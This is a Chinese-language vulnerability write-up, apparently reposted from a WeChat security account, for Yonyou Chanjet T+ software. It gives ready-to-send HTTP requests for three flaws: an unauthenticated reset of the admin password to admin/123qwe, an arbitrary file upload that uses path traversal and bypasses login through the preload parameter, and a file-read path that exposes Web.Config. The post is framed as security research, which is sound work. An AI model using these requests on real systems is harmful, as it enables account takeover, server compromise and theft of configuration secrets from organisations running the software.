用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
一、漏洞描述
用友 畅捷通T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过该漏洞修改管理员账号密码登录后台
二、漏洞影响
用友 畅捷通
三、漏洞复现
访问首页显示如下
访问下列地址查看是否存在漏洞
http://xx.xx.xx.xx/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx
可以看到重置密码仅需pwdNew参数
漏洞利用poc如下
POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=gp3mxvri3leqbqazlatfx5jg
Content-Length: 49
{
"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"
}
重置后的系统管理员账号密码为 admin/123qwe
用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
一、漏洞描述
用友 畅捷通T+ Upload.aspx接口存在任意文件上传漏洞,攻击者通过 preload 参数绕过身份验证并进行文件上传,达到获取服务器权限的目的
二、漏洞影响
用友 畅捷通T+ <= 17.x
三、漏洞复现
首先访问下列地址查看判断漏洞是否存在
http://xx.xx.xx.xx/tplus/SM/SetupAccount/Upload.aspx?preload=1
漏洞利用poc如下
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 188
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysHT4cEvOAWALSZEv
Origin: null
Upgrade-Insecure-Requests: 1
------WebKitFormBoundarysHT4cEvOAWALSZEv
Content-Disposition: form-data; name="File1"; filename="../aaaa.txt"
Content-Type: image/jpeg
aaaa
------WebKitFormBoundarysHT4cEvOAWALSZEv--
直接访问写入的文件
http://xx.xx.xx.xx/tplus/SM/SetupAccount/aaaa.txt
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
一、漏洞简介
用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件
二、漏洞影响
用友 畅捷通
三、漏洞复
存在漏洞的地址
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
原文始发于微信公众号(守卫者安全):用友 畅捷通T+ 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论